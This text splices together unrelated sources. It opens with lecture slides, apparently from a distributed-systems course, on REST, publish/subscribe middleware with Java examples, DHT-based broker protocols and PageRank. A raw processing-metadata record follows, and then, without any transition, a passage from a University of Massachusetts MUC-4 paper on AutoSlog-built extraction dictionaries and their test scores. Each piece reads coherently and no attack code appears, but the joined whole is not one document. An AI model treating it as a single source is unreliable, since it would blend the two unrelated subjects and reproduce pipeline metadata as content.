- Going back and forth is simply moving from one state to another. What happens in a web shopping application when you put items in the shopping cart, leave the cart (and the browser window) untouched for a week, and then try to continue the purchase? Is it possible to bookmark a shopping "state"?
- When a request is sent to an application, only the headers of HTTP requests are examined along the way; thus, in REST it is easier to enforce an access control policy or distinguish between different requests
- For example, if it is forbidden to access some resources that appear in a blacklist, this is easy to enforce when the resources are specified in the head of the message (the URL in a RESTful approach) and difficult if they are in the body (a SOAP message)

Publish/Subscribe

Outline
- Introduction to the Publish/Subscribe Paradigm
- Common Denominators of Pub/Sub Schemes
- How Pub/Sub Compares to "Traditional" Interaction Schemes
- Variants of Pub/Sub Schemes
- Design and Implementation

Why Publish/Subscribe?
- A distributed system may contain thousands of entities, distributed all over the world, whose location and behavior vary greatly
- There is a demand for a more flexible communication system that reflects the dynamic and decoupled nature of such applications

Publish/Subscribe Basics
- Subscribers have the ability to express their interest in (subscribe to) an event or a pattern of events
- Publishers can publish or advertise events
- The Event Notification Service provides storage and management for subscriptions and efficient delivery of events; it acts as a neutral, trusted mediator between publishers and subscribers

Naïve Approach
- Each subscriber acts as a server, listening for notifications
- Each publisher sends notifications to all the clients
- What is the problem?
- Why is this approach different from the publish/subscribe architecture?

Space Decoupling
- The interacting parties (publishers and subscribers) do not need to know each other
- Both parties go through the Event Service for all interactions

Time Decoupling
- The interacting parties do not need to be actively participating in the interaction at the same time

Synchronization Decoupling
- Publishers are not blocked while producing events
- Subscribers can receive asynchronous notifications of events while performing concurrent tasks
- Production and consumption of events do not happen in the main flow of control, so the interaction does not have to be synchronized

Alternative Communication Paradigms: the "cousins" of pub/sub
- Message Passing
- Remote Procedure Call (RPC)
- Shared Spaces
- Message Queuing

Message Passing
- Viewed as the ancestor of distributed interactions
- Participants communicate by sending and receiving messages asynchronously through a network channel
- Similar to pub/sub, but producer and consumer are coupled in time and space
- Asynchronous for the producer but not the consumer
- The channel is set up ahead of time, and producer and consumer are active at the same time
- The recipient of a message is known to the sender

Remote Procedure Call (RPC)
- One of the most widely used forms of distributed interaction
- Remote interactions appear the same as local interactions, making distributed programming easy
- Each request is followed by a response
Remote Procedure Call (RPC)
- Strong time and synchronization coupling (on the consumer side)
- Coupled in space: an invoking object holds a remote reference to each of its invokees

Attempts to remove synchronization in RPC
- Asynchronous RPC: decouples synchronization by making the producer not expect a reply
- Future RPC: decouples synchronization by not blocking the producer, which can access the reply later, when it becomes available

Shared Spaces
- JavaSpaces, TSpaces, and Linda
- Distributed shared memory, common to all participants, who interact by reading and writing to it
- Many-to-many anonymous interaction: time and space decoupling
- Consumers are not asynchronously notified of messages, but retrieve messages with a synchronous request

Message Queuing
- Messages are persistently stored within queues
- All communication is filtered by the queue, similar to the Notification Service in pub/sub
- Consumers must explicitly pull messages from the queue: no synchronization decoupling on the consumer side

Decoupling Abilities of Interaction Paradigms <table> <thead> <tr> <th>Abstraction</th> <th>Space decoupling</th> <th>Time decoupling</th> <th>Synchronization decoupling</th> </tr> </thead> <tbody> <tr> <td>Message Passing</td> <td>No</td> <td>No</td> <td>Producer-side</td> </tr> <tr> <td>RPC/RMI</td> <td>No</td> <td>No</td> <td>Producer-side</td> </tr> <tr> <td>Asynchronous RPC/RMI</td> <td>No</td> <td>No</td> <td>Yes</td> </tr> <tr> <td>Future RPC/RMI</td> <td>No</td> <td>No</td> <td>Yes</td> </tr> <tr> <td>Tuple Spaces</td> <td>Yes</td> <td>Yes</td> <td>Producer-side</td> </tr> <tr> <td>Message queuing</td> <td>Yes</td> <td>Yes</td> <td>Producer-side</td> </tr> <tr> <td><strong>Pub/Sub</strong></td> <td><strong>Yes</strong></td> <td><strong>Yes</strong></td> <td><strong>Yes</strong></td> </tr> </tbody> </table>

Publish/Subscribe
[Diagram: publishers and subscribers interacting through the event service]

Topic-Based Publish/Subscribe
- The earliest pub/sub scheme, based on the notion of topics or subjects
- Topics are similar to the notion of groups
- Subscribing to a topic $T$ can be viewed as becoming a member of a group $T$, and publishing an event on topic $T$ translates to broadcasting the event among the members of $T$
- A programming abstraction that maps individual topics to distinct communication channels (a many-to-many relationship)
- Hierarchy: a subscription made to some node in the hierarchy implicitly involves subscriptions to all the subtopics of that node
- Wildcards offer the possibility to publish and subscribe to several topics that match a given set of keywords at the same time, e.g., an entire subtree or a specific level of the hierarchy

Topic-Based Example

```java
public class StockQuote implements Serializable {
    public String id, company, trader;
    public float price;
    public int amount;
}

public class StockQuoteSubscriber implements Subscriber {
    public void notify(Object o) {
        StockQuote q = (StockQuote) o;
        // string comparison fixed: use equals(), not ==
        if ("TELCO".equals(q.company) && q.price < 100) {
            buy();
        }
    }
}

// ...
Topic quotes = EventService.connect("/LondonStockMarket/Stock/StockQuotes");
Subscriber sub = new StockQuoteSubscriber();
quotes.subscribe(sub);
```
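The Topic and EventService objects in this example are middleware-specific. As a rough illustration only, a centralized, in-memory version of that interface might look like the sketch below; it omits hierarchy, wildcards, persistence, and remote transport, and all internals are invented:

```java
import java.util.List;
import java.util.Map;
import java.util.concurrent.ConcurrentHashMap;
import java.util.concurrent.CopyOnWriteArrayList;

interface Subscriber { void notify(Object event); }

// A topic is just a named channel holding its current subscribers.
class Topic {
    private final List<Subscriber> subs = new CopyOnWriteArrayList<>();
    void subscribe(Subscriber s)   { subs.add(s); }
    void unsubscribe(Subscriber s) { subs.remove(s); }
    void publish(Object event)     { for (Subscriber s : subs) s.notify(event); }
}

// The event service maps hierarchical topic paths such as
// "/LondonStockMarket/Stock/StockQuotes" to channels, creating them lazily.
class EventService {
    private static final Map<String, Topic> topics = new ConcurrentHashMap<>();

    static Topic connect(String path) {
        return topics.computeIfAbsent(path, p -> new Topic());
    }
}
```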
Content-Based Publish/Subscribe
- Subscriptions are related to specific information content
- More flexible than topic-based
- Consumers subscribe to selected events by specifying filters that define constraints
- Filters: name-value pairs with comparison operators (=, <, ≤, >, ≥), logically combined to form complex subscription patterns
- Each combination of information items can be seen as a single dynamic logical channel (more of a many-to-one relationship)

Content-Based: Subscription Patterns
- Strings: most frequently used; must conform to a subscription grammar (SQL, XPath, or some proprietary language) and are parsed by the engine
- Template object: a participant provides an object $t$, meaning it is interested in every event that conforms to the type of $t$ and whose attributes all match the attributes of $t$
- Executable code: subscribers provide a predicate object able to filter events at runtime; the implementation is left to the developer and is hard to optimize

Content-Based Example

```java
public class StockQuote implements Serializable {
    public String id, company, trader;
    public float price;
    public int amount;
}

public class StockQuoteSubscriber implements Subscriber {
    public void notify(Object o) {
        buy(); // only events matching the criteria below are delivered
    }
}

// ...
String criteria = "company == 'TELCO' and price < 100";
Subscriber sub = new StockQuoteSubscriber();
EventService.subscribe(sub, criteria);
```

Type-Based Publish/Subscribe
- Events are filtered by their type
- Example: stock events can be split into two distinct types, stock quotes and stock requests
- Reuses the type scheme of object-oriented languages, providing seamless integration between middleware and programming language
- Aims at providing guarantees such as type safety and encapsulation

Type-Based Example

```java
class LondonStockMarket implements Serializable {
    public String getId() {...}
}

class Stock extends LondonStockMarket {
    public String getCompany() {...}
    public String getTrader() {...}
    public int getAmount() {...}
}

class StockQuote extends Stock {
    public float getPrice() {...}
}

class StockRequest extends Stock {
    public float getMinPrice() {...}
    public float getMaxPrice() {...}
}

class StockSubscriber implements Subscriber<StockQuote> {
    public void notify(StockQuote s) {
        // string comparison fixed: use equals(), not ==
        if ("TELCO".equals(s.getCompany()) && s.getPrice() < 100) buy();
    }
}

// ...
Subscriber<StockQuote> sub = new StockSubscriber();
EventService.<StockQuote>subscribe(sub);
```
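The "executable code" subscription pattern from the content-based section can be made concrete with Java's Predicate interface. The following toy engine is a sketch with invented names, not any particular middleware: each subscription is a (filter, action) pair, and the engine evaluates the filter against every published event:

```java
import java.util.ArrayList;
import java.util.List;
import java.util.function.Consumer;
import java.util.function.Predicate;

class StockQuote {
    final String company;
    final float price;
    StockQuote(String company, float price) { this.company = company; this.price = price; }
}

class ContentBasedChannel {
    private static final class Subscription {
        final Predicate<StockQuote> filter;
        final Consumer<StockQuote> action;
        Subscription(Predicate<StockQuote> f, Consumer<StockQuote> a) { filter = f; action = a; }
    }

    private final List<Subscription> subs = new ArrayList<>();

    void subscribe(Predicate<StockQuote> filter, Consumer<StockQuote> action) {
        subs.add(new Subscription(filter, action));
    }

    void publish(StockQuote q) {
        for (Subscription s : subs)
            if (s.filter.test(q)) s.action.accept(q);  // deliver only matching events
    }

    public static void main(String[] args) {
        ContentBasedChannel channel = new ContentBasedChannel();
        // "company == 'TELCO' and price < 100" expressed as executable code
        channel.subscribe(q -> "TELCO".equals(q.company) && q.price < 100,
                          q -> System.out.println("buy at " + q.price));
        channel.publish(new StockQuote("TELCO", 95f));  // delivered
        channel.publish(new StockQuote("ACME", 42f));   // filtered out
    }
}
```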
Advantages
- Efficient implementations, since message classification is static
- Routing is simple
- Notifications that don't match any subscription aren't sent to clients
- Enables subscribers to describe runtime properties of the objects they want
- Simplicity and flexibility of decentralized implementation (large numbers of clients and data transfers)
- Scalability through the use of content filtering

Disadvantages
- Limited expressiveness
- Inefficient use of bandwidth if a subscriber is only interested in specific criteria
- More expressive schemes incur higher runtime overhead
- Complex protocols/implementations to determine the subscribers
- Many events need to be pruned for performance reasons

Implementing Topic-Based Pub/Sub
- Using a centralized server (which can be replicated/clustered)
- Requires an efficient mechanism for matching events to subscriptions (this problem resembles document search, and similar techniques can be used for both problems)
- Main drawbacks:
  - Servers can become a bottleneck
  - Large fan-out of the event dissemination task, even when applying load balancing across multiple servers

[Diagrams: the fan-out problem; using brokers]

Events
- Event forms:
  - Messages (lower level): a header (message identifier, issuer, priority, expiration time, etc.) and payload data
  - Invocations (higher level): directed to a specific type of object, with well-defined semantics; additional logic transforms low-level messages into invocations of subscriber methods

Architecture alternatives: (a) multicast services, (b) broker-level notification, (c) a peer-to-peer overlay network

Topic-Based Publish/Subscribe
- Option 1: use a group communication toolkit and define a group for each topic
  - There may be scalability problems if the number of clients or the number of topics is very large
  - Does not support multiple topics and range subscriptions well
- Option 2: use a fixed overlay of brokers, in which brokers tell their neighbors for which topics they have subscribers
  - Similar to IP multicast; for efficiency, use Bloom filters
- Yet another option is to employ a set of brokers that form a self-organized overlay (P2P)

P2P Implementation of Pub/Sub
- For each topic, build a dissemination tree among the brokers that have active subscribers
- All events are flooded along the tree arcs
- A broker that receives a new subscription should join the tree as a leaf
- A broker that no longer has active subscriptions should leave the tree
- Questions:
  - How do we build this tree dynamically?
  - We would like to load-balance the job of being the root for different topics (trees)
  - We would like to ensure that most brokers with no active subscribers for a given topic are not included in the tree
- Possible solution: utilize a DHT
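One concrete way to realize "utilize a DHT" is consistent hashing: place broker identifiers and topic hashes on the same ring, and let the successor of a topic's hash serve as the root of that topic's dissemination tree. A minimal sketch with invented names (the hash function is a stand-in for a real consistent hash, and brokers must join before lookups):

```java
import java.util.SortedMap;
import java.util.TreeMap;

class BrokerRing {
    private final SortedMap<Integer, String> ring = new TreeMap<>();

    void join(String brokerId)  { ring.put(hash(brokerId), brokerId); }
    void leave(String brokerId) { ring.remove(hash(brokerId)); }

    // The root broker for a topic = successor of hash(topic) on the ring.
    String rootFor(String topic) {
        int h = hash(topic);
        SortedMap<Integer, String> tail = ring.tailMap(h);
        return tail.isEmpty() ? ring.get(ring.firstKey()) : tail.get(tail.firstKey());
    }

    private static int hash(String s) {
        return s.hashCode() & 0x7fffffff;  // illustrative only
    }

    public static void main(String[] args) {
        BrokerRing ring = new BrokerRing();
        ring.join("brokerA"); ring.join("brokerB"); ring.join("brokerC");
        // Different topics land on different roots, balancing the root role.
        System.out.println(ring.rootFor("/LondonStockMarket/Stock/StockQuotes"));
        System.out.println(ring.rootFor("/Weather/Helsinki"));
    }
}
```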
Self-Organization of Brokers for Publish/Subscribe
- Subscribing protocol:
  - A subscriber contacts its nearest broker and passes the subscription to it
  - A broker $b$ that receives a subscription:
    - Creates an entry (e.g., in a hash table) with a back link to the node (broker or client) that sent it the subscription
    - Uses a hash of the subscription tag to ask the DHT for the next node $n$ to route to
    - If $n \neq b$, then $b$ forwards the subscription message to the next node $n$
- Unsubscribing protocol: the opposite

Publishing Protocol
- A publisher contacts its nearest broker and passes it the tagged event in an UP message
- A broker $b$ that receives a tagged event in an UP message asks the DHT for the next node $n$ to route to
  - If $n \neq b$, then $b$ forwards the UP message to the next node $n$
  - Otherwise, $b$ sends the tagged event in a DOWN message on every back link that corresponds to a subscription it knows about that matches the event's topic
- A broker $b$ that receives a tagged event in a DOWN message sends the tagged event in a DOWN message on every back link that corresponds to a subscription matching the event's topic
- When a subscriber gets a tagged event that matches any of its subscriptions, it passes the tagged event to the application

Qualities of Service
- Persistence
- Priorities
- Transactions
- Reliability

Information-Driven Applications
- Communication is indirect and initiated by publishers of information
- News delivery, stock quoting, air traffic control, e-commerce, social networking, anomaly detection, electronic mailing lists or bulletin boards, chat rooms and instant message services

Advantages/Disadvantages of Pub/Sub
- Advantages: scalability; loose coupling
- Disadvantages: the same loose decoupling can make end-to-end behavior harder to reason about

References
- The Many Faces of Publish/Subscribe
- Publish/Subscribe Communication Systems: from Models to Applications
- Survey of Publish Subscribe Communication Systems, http://medianet.kent.edu/surveys/IAD04F-pubsubnet-shennaaz/Survey2.html

PAGE RANK

The search engine spider crawls the web by following hyperlinks on Web pages and compiles a list of pages to be stored in the search engine index. The index contains detailed data about each Web page and the links associated with each page. When a user performs a search, a sophisticated algorithm is applied to the index, which returns occurrences of the query ranked from most to least relevant. The Internet is made up of billions of Web pages with many billions of links between them.

Are all Pages Equally Important? If a tree falls in the forest, and nobody blogs about it... does it make a difference?

Link Structure of the Web
- The number of links is about 10 times the number of pages
- Backlinks and forward links: A and B are C's backlinks; C is A's and B's forward link
- Intuitively, a webpage is important if it has a lot of backlinks
- But what if a webpage has only one backlink, and that link comes from www.yahoo.com?

A Simple Version of PageRank

\[ R(u) = c \sum_{v \in B_u} \frac{R(v)}{N_v} \]

- $u$: a web page
- $B_u$: the set of $u$'s backlinks
- $N_v$: the number of forward links of page $v$
- $c$: the normalization factor chosen so that $\| R \|_1 = 1$ (where $\| R \|_1 = |R_1| + \cdots + |R_n|$)
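A short power-iteration sketch of this computation, using the three-page example worked out below (assumed page order: Yahoo, Amazon, Microsoft). Entry M[u][v] holds 1/N_v when page v links to page u; since M is column-stochastic, the rank vector stays normalized:

```java
public class SimplePageRank {
    public static void main(String[] args) {
        double[][] M = {
            {0.5, 0.5, 0.0},   // Yahoo     <- Yahoo, Amazon
            {0.5, 0.0, 1.0},   // Amazon    <- Yahoo, Microsoft
            {0.0, 0.5, 0.0}    // Microsoft <- Amazon
        };
        double[] r = {1.0 / 3, 1.0 / 3, 1.0 / 3};  // uniform start

        for (int iter = 0; iter < 50; iter++) {
            double[] next = new double[r.length];
            for (int u = 0; u < r.length; u++)
                for (int v = 0; v < r.length; v++)
                    next[u] += M[u][v] * r[v];  // R(u) = sum over backlinks v of R(v)/N_v
            r = next;                           // column-stochastic M keeps ||r||_1 = 1
        }
        System.out.printf("Yahoo=%.3f Amazon=%.3f Microsoft=%.3f%n", r[0], r[1], r[2]);
    }
}
```

For this link matrix the iteration settles at (0.4, 0.4, 0.2), consistent with the convergence after a few iterations noted below.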
An Example of Simplified PageRank (pages ordered Yahoo, Amazon, Microsoft; the link matrix $M$ has $M_{uv} = 1/N_v$ when $v$ links to $u$)

PageRank calculation, first iteration:

\[
\begin{bmatrix} 1/3 \\ 1/2 \\ 1/6 \end{bmatrix}
=
\begin{bmatrix} 1/2 & 1/2 & 0 \\ 1/2 & 0 & 1 \\ 0 & 1/2 & 0 \end{bmatrix}
\begin{bmatrix} 1/3 \\ 1/3 \\ 1/3 \end{bmatrix}
\]

PageRank calculation, second iteration:

\[
\begin{bmatrix} 5/12 \\ 1/3 \\ 1/4 \end{bmatrix}
=
\begin{bmatrix} 1/2 & 1/2 & 0 \\ 1/2 & 0 & 1 \\ 0 & 1/2 & 0 \end{bmatrix}
\begin{bmatrix} 1/3 \\ 1/2 \\ 1/6 \end{bmatrix}
\]

The ranks converge after some iterations.

A Problem with Simplified PageRank: a loop. During each iteration, the loop accumulates rank but never distributes rank to other pages!

An example of the problem, first iteration:

\[
\begin{bmatrix} 1/3 \\ 1/6 \\ 1/2 \end{bmatrix}
=
\begin{bmatrix} 1/2 & 1/2 & 0 \\ 1/2 & 0 & 0 \\ 0 & 1/2 & 1 \end{bmatrix}
\begin{bmatrix} 1/3 \\ 1/3 \\ 1/3 \end{bmatrix}
\]

Second iteration:

\[
\begin{bmatrix} 1/4 \\ 1/6 \\ 7/12 \end{bmatrix}
=
\begin{bmatrix} 1/2 & 1/2 & 0 \\ 1/2 & 0 & 0 \\ 0 & 1/2 & 1 \end{bmatrix}
\begin{bmatrix} 1/3 \\ 1/6 \\ 1/2 \end{bmatrix}
\]

Random Walks in Graphs
- The Random Surfer Model: the standing probability distribution of a random walk on the graph of the web (the surfer simply keeps clicking successive links at random)
- The Modified Model: the "random surfer" keeps clicking successive links at random, but periodically "gets bored" and jumps to a random page chosen from the distribution $E$

Modified Version of PageRank

\[ R'(u) = c_1 \sum_{v \in B_u} \frac{R'(v)}{N_v} + c_2 E(u) \]

$E(u)$: a distribution over web pages that "users" jump to when they "get bored" with following successive links at random.

An Example of Modified PageRank

\[
M = \begin{bmatrix} 0.5 & 0.5 & 0 \\ 0.5 & 0 & 0 \\ 0 & 0.5 & 0.5 \end{bmatrix},
\qquad
R_0 = \begin{bmatrix} 1/3 \\ 1/3 \\ 1/3 \end{bmatrix}
\quad \text{(Yahoo, Amazon, Microsoft)},
\qquad
c_1 = 0.8, \; c_2 = 0.2
\]

Pages with no Outgoing Links
- What should we do with pages that have no outgoing links?
  - Add a self-link
  - Treat them as if they have a link to every page in the graph
- Which approach is better?

Convergence Property
- The Web is an expander-like graph
  - Theory of random walks: a random walk on a graph is said to be rapidly mixing if it quickly converges to a limiting distribution on the set of nodes in the graph; a random walk is rapidly mixing on a graph if and only if the graph is an expander graph
  - Expander graph: every subset of nodes $S$ has a neighborhood (the set of vertices accessible via out-edges emanating from nodes in $S$) larger than some factor $\alpha$ times $|S|$; a graph has a good expansion factor if and only if its largest eigenvalue is sufficiently larger than the second-largest eigenvalue

Big Data and How it Changes the World

How will Large-Scale Information Systems Change our World?
- More privacy or less privacy?
- Greater influence for individuals and small groups, or greater influence for rich, strong companies?
- How will collecting data change the way people view the world?

Which Grain of Sand Makes a Heap?
- Which bit turns data into Big Data?
- Which piece of information transforms data into knowledge?
{"Source-Url": "http://courses2.cit.cornell.edu/cs5301/lect10.pdf", "len_cl100k_base": 6960, "olmocr-version": "0.1.48", "pdf-total-pages": 56, "total-fallback-pages": 0, "total-input-tokens": 96074, "total-output-tokens": 9375, "length": "2e12", "weborganizer": {"__label__adult": 0.0003097057342529297, "__label__art_design": 0.0003402233123779297, "__label__crime_law": 0.0003247261047363281, "__label__education_jobs": 0.0028820037841796875, "__label__entertainment": 7.396936416625977e-05, "__label__fashion_beauty": 0.0001264810562133789, "__label__finance_business": 0.00028061866760253906, "__label__food_dining": 0.00030112266540527344, "__label__games": 0.0004336833953857422, "__label__hardware": 0.0010423660278320312, "__label__health": 0.0003910064697265625, "__label__history": 0.0002980232238769531, "__label__home_hobbies": 9.703636169433594e-05, "__label__industrial": 0.0004067420959472656, "__label__literature": 0.0004055500030517578, "__label__politics": 0.00021004676818847656, "__label__religion": 0.0004448890686035156, "__label__science_tech": 0.037506103515625, "__label__social_life": 0.00015294551849365234, "__label__software": 0.0122222900390625, "__label__software_dev": 0.94091796875, "__label__sports_fitness": 0.00018393993377685547, "__label__transportation": 0.0005536079406738281, "__label__travel": 0.00017154216766357422}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 29432, 0.0218]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 29432, 0.36958]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 29432, 0.81114]], "google_gemma-3-12b-it_contains_pii": [[0, 106, false], [106, 980, null], [980, 1245, null], [1245, 1358, null], [1358, 1822, null], [1822, 2334, null], [2334, 3087, null], [3087, 3934, null], [3934, 4584, null], [4584, 5126, null], [5126, 5483, null], [5483, 5825, null], [5825, 6519, null], [6519, 7352, null], [7352, 7607, null], [7607, 8333, null], [8333, 8840, null], [8840, 9528, null], [9528, 10329, null], [10329, 10565, null], [10565, 11153, null], [11153, 11491, null], [11491, 11874, null], [11874, 12313, null], [12313, 12554, null], [12554, 12947, null], [12947, 13355, null], [13355, 13805, null], [13805, 14121, null], [14121, 14387, null], [14387, 15336, null], [15336, 15975, null], [15975, 16334, null], [16334, 17350, null], [17350, 18378, null], [18378, 19438, null], [19438, 20145, null], [20145, 20792, null], [20792, 20823, null], [20823, 21281, null], [21281, 22186, null], [22186, 23082, null], [23082, 23877, null], [23877, 24250, null], [24250, 24728, null], [24728, 25296, null], [25296, 25440, null], [25440, 26009, null], [26009, 26603, null], [26603, 26810, null], [26810, 27276, null], [27276, 27644, null], [27644, 28157, null], [28157, 28996, null], [28996, 29299, null], [29299, 29432, null]], "google_gemma-3-12b-it_is_public_document": [[0, 106, true], [106, 980, null], [980, 1245, null], [1245, 1358, null], [1358, 1822, null], [1822, 2334, null], [2334, 3087, null], [3087, 3934, null], [3934, 4584, null], [4584, 5126, null], [5126, 5483, null], [5483, 5825, null], [5825, 6519, null], [6519, 7352, null], [7352, 7607, null], [7607, 8333, null], [8333, 8840, null], [8840, 9528, null], [9528, 10329, null], [10329, 10565, null], [10565, 11153, null], [11153, 11491, null], [11491, 11874, null], [11874, 12313, null], [12313, 12554, null], [12554, 12947, null], [12947, 13355, null], [13355, 13805, null], [13805, 14121, 
null], [14121, 14387, null], [14387, 15336, null], [15336, 15975, null], [15975, 16334, null], [16334, 17350, null], [17350, 18378, null], [18378, 19438, null], [19438, 20145, null], [20145, 20792, null], [20792, 20823, null], [20823, 21281, null], [21281, 22186, null], [22186, 23082, null], [23082, 23877, null], [23877, 24250, null], [24250, 24728, null], [24728, 25296, null], [25296, 25440, null], [25440, 26009, null], [26009, 26603, null], [26603, 26810, null], [26810, 27276, null], [27276, 27644, null], [27644, 28157, null], [28157, 28996, null], [28996, 29299, null], [29299, 29432, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 29432, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, true], [5000, 29432, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 29432, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 29432, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 29432, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 29432, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 29432, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 29432, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 29432, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 29432, null]], "pdf_page_numbers": [[0, 106, 1], [106, 980, 2], [980, 1245, 3], [1245, 1358, 4], [1358, 1822, 5], [1822, 2334, 6], [2334, 3087, 7], [3087, 3934, 8], [3934, 4584, 9], [4584, 5126, 10], [5126, 5483, 11], [5483, 5825, 12], [5825, 6519, 13], [6519, 7352, 14], [7352, 7607, 15], [7607, 8333, 16], [8333, 8840, 17], [8840, 9528, 18], [9528, 10329, 19], [10329, 10565, 20], [10565, 11153, 21], [11153, 11491, 22], [11491, 11874, 23], [11874, 12313, 24], [12313, 12554, 25], [12554, 12947, 26], [12947, 13355, 27], [13355, 13805, 28], [13805, 14121, 29], [14121, 14387, 30], [14387, 15336, 31], [15336, 15975, 32], [15975, 16334, 33], [16334, 17350, 34], [17350, 18378, 35], [18378, 19438, 36], [19438, 20145, 37], [20145, 20792, 38], [20792, 20823, 39], [20823, 21281, 40], [21281, 22186, 41], [22186, 23082, 42], [23082, 23877, 43], [23877, 24250, 44], [24250, 24728, 45], [24728, 25296, 46], [25296, 25440, 47], [25440, 26009, 48], [26009, 26603, 49], [26603, 26810, 50], [26810, 27276, 51], [27276, 27644, 52], [27644, 28157, 53], [28157, 28996, 54], [28996, 29299, 55], [29299, 29432, 56]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 29432, 0.01275]]}
olmocr_science_pdfs
2024-11-25
2024-11-25
fa0d3219c40331bcc8a8985df9296ed78b04fd5f
INTRODUCTION The UMass/MUC-4 system is based on a form of sentence analysis known as selective concept extraction. This approach to language processing is distinguished by a minimal reliance on syntactic sentence analysis, along with a minimal dictionary customized to operate in a limited domain. Last year, the UMass/MUC-3 system demonstrated the viability of selective concept extraction, but serious questions were raised about the portability and scalability of the technology, particularly with respect to the creation of domain-dependent and task-dependent dictionaries. We estimated that 9 person/months went into the creation of the dictionary used by UMass/MUC-3, and we were unable to say how much domain-dependent lexicon was still missing. We were nevertheless sure that our dictionary coverage was incomplete. This year we confronted the issue of efficient system development, with particular attention to the problem of dictionary construction. As a result, we are now in a position to claim that effective customized dictionaries can be constructed quickly and easily by relatively inexperienced system developers. The dictionary used by UMass/MUC-3 emerged after roughly 1500 hours of highly skilled labor by two advanced graduate students and one post doc. For MUC-4, we created a new dictionary that achieved nearly the full functionality of the UMass/MUC-3 dictionary after only 8 hours of effort on the part of a first-year graduate student. This outcome was achieved through the use of an automated dictionary construction tool called AutoSlog. The AutoSlog dictionary was used for our optional TST3 and TST4 runs, while a modified version of our UMass/MUC-3 dictionary was used for our official TST3 and TST4 runs. Our optional and official systems were identically configured except for their dictionaries. Our official UMass/MUC-4 system employs a new memory-based consolidation module for discourse analysis, some generic enhancements to the CIRCUS sentence analyzer, and filters that operate after sentence analysis and then again after consolidation in order to reduce spurious slot fills and spurious templates. We also made a number of adjustments associated with MUC-4 template updates and domain specifications. We found it necessary to eliminate last year's optional case-based consolidation module because of its strong tendency toward overgeneration. Even so, we had two competing consolidation modules to evaluate, as well as a variety of possible filters. To resolve all of these other system options, we ran hundreds of tests over TST1, TST2 and 250 additional texts from the development corpus. OFFICIAL TESTING AND RESULTS We ran four test sets for MUC-4. Our official system was run on TST3 and TST4 as required, and we ran one additional optional system on TST3 and TST4. The official system and optional system were identical except for their dictionaries. The optional system ran a dictionary constructed by AutoSlog that contained 379 concept node definitions. Our official system ran with a version of the UMass/MUC-3 dictionary augmented by 76 additional concept node definitions imported from the AutoSlog dictionary (for a total of 389 concept node definitions). Both dictionaries accessed the same 5436 lexical definitions for part-of-speech recognition (these definitions were taken from the UMass/MUC-3 dictionary), along with 2102 proper names. 
We predicted that both systems would produce comparable levels of precision, and that the optional system would fall behind the official system by 10 recall points under All Templates. Table 1 contains the All Templates scores for all four test runs. Our official and optional systems both crashed twice on TST3, once on a relevant text containing three key templates and once again on an irrelevant text. No system crashes occurred during TST4. We note that the official system was run on all of DEV, TST1, and TST2 without any fatal errors shortly before the official testing began.

### University of Massachusetts: MUC-4 Test Results and Analysis

As predicted, the AutoSlog dictionary produced lower recall levels than the official system: 7 points lower for TST3, and 12 points lower for TST4. Precision was comparable for both systems, with AutoSlog generating higher overall precision rates: 2 points higher for TST3 and 1 point higher for TST4. We note that our performance on TST4 was generally worse than on TST3. However, a close inspection of the detailed score reports for the official system shows that the primary difference in those reports lies in the All Templates precision scores: 57 for TST3 vs. 45 for TST4. This loss of precision can be explained for the most part by comparing the number of spurious templates: 16 for TST3 vs. 31 for TST4.

<table> <thead> <tr> <th>System</th> <th>recall</th> <th>precision</th> <th>P&amp;R</th> <th>2P&amp;R</th> <th>P&amp;2R</th> </tr> </thead> <tbody> <tr> <td>Official TST3</td> <td>47</td> <td>57</td> <td>51.52</td> <td>54.67</td> <td>48.71</td> </tr> <tr> <td>Optional TST3</td> <td>40</td> <td>59</td> <td>47.67</td> <td>53.88</td> <td>42.75</td> </tr> <tr> <td>Official TST4</td> <td>48</td> <td>45</td> <td>46.45</td> <td>45.57</td> <td>47.37</td> </tr> <tr> <td>Optional TST4</td> <td>36</td> <td>46</td> <td>40.39</td> <td>43.58</td> <td>37.64</td> </tr> </tbody> </table>

Table 1: Overall Scores under All Templates for the Four UMass/MUC-4 Test Runs

Setting aside the differences between TST3 and TST4, we were pleased to see how well the AutoSlog dictionary performed relative to our hand-crafted dictionary from last year. Comparing P&R scores, our AutoSlog dictionary achieved 93% of the overall performance of our official system on TST3, and 87% of the official system's performance on TST4.
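For reference, the P&R, 2P&R, and P&2R columns in Table 1 are the standard F-measures used in the MUC evaluations, with beta = 1, 0.5, and 2 respectively (this is background on MUC scoring rather than something stated explicitly in this paper):

\[
F_{\beta} = \frac{(\beta^{2} + 1)\,P\,R}{\beta^{2} P + R},
\qquad
F_{1}(\text{TST3 official}) = \frac{2 \cdot 57 \cdot 47}{57 + 47} \approx 51.5
\]

which reproduces the official TST3 P&R score of 51.52 up to rounding of P and R.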
In an effort to leverage both the UMass/MUC-3 and the AutoSlog dictionaries, we strengthened the performance of the MUC-3 dictionary by augmenting it with 76 AutoSlog definitions. [Footnote 1: Other methods of leveraging the two dictionaries were tested, but this was the most effective strategy.] Without this boost to the MUC-3 dictionary, the distance between our official and optional systems would have been insignificant.

